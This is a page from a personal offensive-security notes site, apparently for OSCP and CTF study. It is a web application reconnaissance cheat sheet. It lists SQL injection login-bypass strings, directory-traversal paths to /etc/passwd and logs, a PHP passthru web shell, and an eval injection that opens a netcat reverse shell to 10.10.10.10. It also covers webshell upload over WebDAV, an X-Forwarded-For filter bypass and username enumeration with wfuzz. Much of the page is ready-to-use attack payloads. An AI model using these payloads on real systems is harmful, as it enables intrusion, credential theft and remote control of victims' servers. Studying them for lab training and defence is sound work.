VulnableOne
  • 🧘‍♂️About Me
  • Offensive Treasure
    • 🧌Penetration Testing
      • Reconnaissance
        • Identify Ports/Hosts/Data
      • Enumeration
        • Service Ports
          • FTP (21)
          • SSH (22)
          • SMTP (25)
          • DNS (53)
          • TFTP (69/udp)
          • Finger (79)
          • SaMBa (139/445)
          • RPC/NFS (111/135)
          • SNMP (161/udp)
          • LDAP (389)
          • isakmp (500/udp)
          • Java (1099)
          • MS-SQL (1433)
          • MySQL (3306)
          • Distcc (3622)
          • PostgreSQL (5437)
          • Redis (6379)
      • Password Attack
        • Wordlist
        • Brute-Force
        • Crack Hash
      • File Transfer
        • Linux
        • Window
      • Misc
    • 🧙‍♂️AD Attack
      • Domain Enumeration
        • PowerView
        • AD-Module
        • Bloodhound
      • Abuse ACLs
        • GenericAll
        • GenericWrite
        • WriteDACL
        • ForceChangePassword
      • Kerberos Attack
        • Kerberoasting
        • ASREPRoasting
        • Unconstrained Delegation
        • Constrained Delegation
        • Resource Based Constrained Delegation
      • LAPs
      • MS SQL Servers
        • PowerUpSQL
        • SQL Server Management
        • Impacket-MSSQL
    • 🥷Red Team
      • Reconnaissance
        • Active Scanning
          • Scanning IP Blocks
          • Vulnerability Scanning
          • Wordlist Scanning
        • Gather Victim Host Information
          • Software
        • Gather Victim Identity Information
          • Credentials
          • Email Addresses
        • Search Open Websites/Domains
          • Social Media
          • Search Engines
          • Code Repositories
        • Search Victim-Owned Websites
      • Resource Development
        • C2 Infrastructure
        • Metasploit
      • Execution
        • Bash - Reverse Shell
        • HTA
        • JScript Dropper
        • Macro
        • Metasploit
        • Network Tools
        • Powershell
        • Python
        • VBA
        • Web Shell
        • WSH
      • Persistence
        • Logon Script
        • Startup Folder
        • WinLogon (Elevated)
        • Run / RunOnce (Elevated)
        • Scheduled Tasks (Elevated )
      • Privilege Escalation
        • Windows
          • SeBackup / SeRestore
          • SeTakeOwnership
          • SeImpersonate / SeAssignPrimaryToken
          • UAC Bypass
          • AutoInstall Elevate
          • Unquoted Service Paths
          • Weak Service Permissions
          • Weak Service Binary Permissions
        • Linux
          • Escalation
      • Defense Evasion
        • Bypassing AV
          • Pack Shellcode
        • Security Control
          • CLM
          • AppLocker
        • Use Alternate Authentication Material
          • Pass The Hash
          • Over Pass The Hash
          • Extract Tickets
          • Pass The Ticket
        • Impersonate
      • Credential Access
        • Adversary-in-the-Middle
          • LLMNR/NBT-NS/MDNS Poisoning
          • Evil SSDP
        • OS Credential Dumping
          • Protected LSASS
          • Invoke-Mimikatz
          • Mimikatz.exe
          • Secretsdump
          • Meterpreter Kiwi
          • Registry
          • Shadow Copy
          • DCSync
        • Steal or Forge Kerberos Tickets
          • Silver Ticket
          • Golden Ticket
        • Steal Web Session Cookie
      • Lateral Movement
        • Remote Access
        • Pivoting
          • Linux
          • Window
    • Web Application
      • Basic Recon
  • Blog
    • 📝Empty!!!
  • Course Review
    • 👨‍🎓Cyber Security Courses Journey
      • PNPT Journey
      • OSCP Journey
        • 🚩CTF
          • Hack The Box
            • Linux Boxes
              • ✅Admirer (Easy)
              • ✅Bashed (Easy)
              • ✅Beep (Easy)
              • ✅Blocky (Easy)
              • ✅FriendZone (Easy)
              • ✅Irked (Easy)
              • ✅Lame (Easy)
              • ✅Mirai (Easy)
              • ✅Networked (Easy)
              • ✅Nibbles (Easy)
              • ✅OpenAdmin (Easy)
              • ✅Sense (Easy)
              • ✅Shocker (Easy)
              • ✅Sunday (Easy)
              • ✅Tabby (Easy)
              • ✅Traverxec (Easy)
              • ✅Valentine (Easy)
              • ✅Cronos (Medium)
              • ✅Haircut (Medium)
              • ✅Jarvis (Medium)
              • ✅Magic (Medium)
              • ✅Nineveh (Medium)
              • ✅Node (Medium)
              • ✅Poison (Medium)
              • ✅SolidState (Medium)
              • ✅TartarSauce (Medium)
            • Window Boxes
              • ✅Arctic (Easy)
              • ✅Active (Easy)
              • ✅Blue (Easy)
              • ✅Bounty (Easy)
              • ✅Devel (Easy)
              • ✅Forest (Easy)
              • ✅Granny (Easy)
              • ✅Granpa (Easy)
              • ✅Jerry (Easy)
              • ✅Legacy (Easy)
              • ✅Optimum (Easy)
              • ✅Bastard (Medium)
              • ✅Silo (Medium)
          • Buffer Overflow
            • BOF - Tib3rius
            • BOF - TCM
              • 1- Spiking
              • 2- Fuzzing
              • 3- Finding Offset
              • 4- Overwriting EIP
              • 5- Finding Bad Characters
              • 6- Finding the Right Module
              • 7- Generating Shellcode
Powered by GitBook
On this page
  • Web Application Assessment Methodology
  • Web Application Enumeration
  • Web Checklist
  • WordPress
  • Gobuster
  • Create loop to scan
  • Through Proxy
  • Dirbuster
  • Nikto
  • Username Enum
  • Curl Command
  • Webdev
  • Nmap
  1. Offensive Treasure
  2. Web Application

Basic Recon

Web Application Assessment Methodology

  • What does the application do?

  • What language is it written in?

  • What server software is the application running on?

Web Application Enumeration

  • Programming language and frameworks

  • Web Server Software

  • Database software

  • Server Operating System

Web Checklist

# Default Credentials
- /robots.txt
- admin/admin, admin/password, admin/machine-name, machine-name/machine-name
- Search on google for default credential of the application
- Hydra
- /Fuzz - applciation/Fuzz - index.php/fuzz
- Fuzz with extension(.txt,.conf,txt,html,php,asp,aspx,jsp,db,sql,exe,config,db
bak,cgi,ps1,py,ini,js,sh,.php,.txt,.json,.html
- SQL Bypass Auth
- Entry Point: ' '' ` ') ") `) ')) ")) `)) 
- Password Field: ' || ''==' ( No SQL Injection Payload )
- admin' or 1==1 
- ' or 1=1 -- -
- ' || 1=1 -- -
- whatweb -v
- Customize login password with array  (username=admin&password[]=)
- /index.[php,html,asp.aspx] or /randomthing-get-error
- LFI / Directory Traversal -> SSH key
- LFI / Configuration of Service File
- Checking eval() 2+2 2*2
- Checking with POST request
- WordPress Plugin vulnerable
- Check Source Code to Find Plugin install
- Looking for hostname and Zone Transfer
- ?file=/etc/passwd (absolute path)
- ?file=../../../etc/passwd - ?file=../../../../etc/passwd
- ?file=../../../../var/log/apache2/access.log
- ?file=../../../../var/www/html/index.php
#Success Login
- Version (Exploit-db)
- File Upload
- User privilege might change 
- Code execution directly a new post/page
- Module? Extension? Addons?
- Create own Module, extension, addone (Malicious)
- Access through CMS to sensitive database information credentaisl
- Can we schedule any system level jobs?
- Escalate to Administration privilege
- Diagnostic Tools - System Level Execute?
- Configuration File?
- Modify or Inject php code on existing file?
<?php
<pre>
passthru($_GET['cmd']);
</pre>
?>
- page=index');eval('phpinfo();');#
- page=index');eval("(system('nc 10.10.10.10 443 -e /bin/bash');");#

WordPress

wpscan --url http://10.10.10.10 --enumerate ap,at,cb,dbe

Gobuster

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x.php

  • -x : specific file extension

  • -k : disable check certificate error

  • --exclude-length: exclude specific length not to display

  • -o: for output

  • -f: add / at the end of the file

  • -n: not to print specific status code

  • -w: wordlist

  • -t for thread

Create loop to scan

for i in uploads dev admin test; do
gobuster dir -u http://10.10.10.10/$i -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x.php -o gobuster.$i.log
done

Through Proxy

proxychains gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/common.txt -x html -t 50 --proxy socks5://127.0.0.1:8080

Dirbuster

dirb http://10.10.10.10/project -u admin:password

Nikto

nikto -h http://10.10.10.10
nikto -h http://10.10.10.10 -o nikto.html -Format htm

Username Enum

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "usename=FUZZ&password=anything" -hs "No Account found with that username" http://10.10.10.10/login.php

Curl Command

#Send HTTP GET request to each discovered directory and checking for 200 OK status
curl -I -L google.com

#send HTTP request with Header
curl -H "User-Agent: Mozilla Firefox" 10.10.10.10/secret

#Bypass Filter
curl http://10.10.10.10:13337/logs -H "X-Forwarded-For: localhost"
└─$ curl http://10.10.10.10:13337/logs?file=/etc/passwd -H "X-Forwarded-For: localhost"
└─$ curl -X POST http://10.10.10.10:13337/update -H "Content-Type: application/json" -H "X-Forwarded-For: localhost" --data '{"user":"admin","url":"http://10.10.10.10/shell"}'

#We can request with curl -d "" with no data which content-length: 0
└─$ curl -d "" -X POST http://10.10.10.10:33333/list-current-deployments
<p>Not Implemented</p>   

└─$ curl -d "" -X POST http://10.10.10.10:33333/list-running-procs 


└─$ proxychains curl -X POST --data "data=ls" -H 'X-Forwarded-For: 127.0.0.1' http://10.10.10.10/cmd.php

Webdev

#Running davtest tool.
davtest -url http://10.10.10.10/webdav
davtest -auth bob:password_123 -url http://10.10.10.10/webdav

#Interact with webdav 
cadaver http://10.10.10.10/webda
put /usr/share/webshells/asp/webshell.asp

Nmap

#Running http-enum nmap script to discover interesting directories.
nmap --script http-enum -sV -p 80 10.10.10.10

#Running Header script to get the IIS server header information.
nmap --script http-headers -sV -p 80 10.10.10.10

#Running http-methods script on /webdav path to discover all allowed methods
 nmap --script http-methods --script-args http-methods.url-path=/webdav/
10.10.10.10

#Running webdav scan Nmap script to identify WebDAV installations the script uses the
OPTIONS and PROPFIND methods to detect it
nmap --script http-webdav-scan --script-args http-methods.url-path=/webdav/
10.10.10.10
PreviousWeb ApplicationNextEmpty!!!

Last updated 1 year ago